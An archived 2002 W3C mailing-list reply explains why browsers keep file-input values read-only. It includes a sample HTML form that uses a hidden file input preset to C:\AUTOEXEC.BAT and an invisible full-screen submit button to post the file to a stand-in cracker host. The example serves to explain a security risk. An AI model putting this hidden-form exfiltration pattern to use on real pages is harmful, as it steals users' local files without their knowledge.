- From: Christian Wolfgang Hujer <Christian.Hujer@itcqis.com>
- Date: Thu, 14 Feb 2002 15:32:03 +0100
- To: Tanev Robert <RT@railconsult.de>, www-html@w3.org
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hello Tanev,
Am Donnerstag, 14. Februar 2002 14:44 schrieb Tanev Robert:
> Hallo everybody,
>
> we are facing the following problem: we want to provide an input element of
> type file with a default value that should be displayed by default
> (actually it is the current value of a specific attribute). While the
> value-property is read only in IE5-6, we tried to set the
> defaultValue-property through script:
>
> var oInput = document.createElement("INPUT");
> oInput.type = "file";
> oInput.defaultValue = _someValue_;
> oParent.appendChild(oInput);
>
> Unfortunately, the default value is not displayed. The documentation
> states, that changing the defaultValue has no effect until a form was
> reseted, but in our test case this did not happened.
>
> Does anybody know, how to force a file input element to show an initial
> value or does somebody has a workaround for this?
I hope there never will be a workaround for this since this is a security
issue, as Andrew already said. I won't repeat what Andrew said (I completely
agree with him), I just want to add further information on the *why* this is
a security issue.
Imagine code like this:
<!-- ... -->
<form method="post" action="http://www.somecracker.mars/filereceiver">
<input
type="file"
style="
/* make this one invisible */
display:none;
visibility:hidden;
/* Ensure it really is invisible */
color:transparent;
background-color:transparent;
/* Ensure if above failed, at least the border is invisible */
border:none;
/* Another way to make it invisible */
width:0px;
height:0px;
"
name="f"
value="C:\AUTOEXEC.BAT"
/>
<input
type="submit"
style="
/* make button itself invisible */
color:transparent;
background-color:transparent;
/* make button border invisible */
border-style:none;
/* make button fill whole screen */
display:block;
position:absolute;
left:0px;
right:0px;
width:auto;
top:0px;
bottom:0px;
height:auto;
/* make button frontmost component */
z-index:2;
"
value=""
/>
<!--
value: make button have no text (in case browser ignores color:transparent)
-->
</form>
<!-- ... -->
It even isn't a single line of ECMAScript code required to let the default
value of <input type="file" /> be a security issue.
So ECMAScript must not be allowed to override the security defaults of the
browser in any way. This even must not be allowed on intranets, since this
would allow a new kind of trojans. Or it would allow your co-workers to spy
your desktop.
And if I knew a workaround for this, I'd rather report it to bugtraq @
securityfocus and the browser vendor, not to this list ;)
Greetings
- --
Christian Wolfgang Hujer
Geschäftsführender Gesellschafter
ITCQIS GmbH
Telefon: +49 (089) 27 37 04 37
Telefax: +49 (089) 27 37 04 39
E-Mail: mailto:Christian.Hujer@itcqis.com
WWW: http://www.itcqis.com/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE8a8pmGU/Ex9kzkZ4RAiR6AKCmQ7yTdPDEln73+p1gWZA6cAJ6QwCgufc4
Uje+oT/fSjMPa08ZsIJSIxM=
=Lboe
-----END PGP SIGNATURE-----
Received on Thursday, 14 February 2002 10:10:10 UTC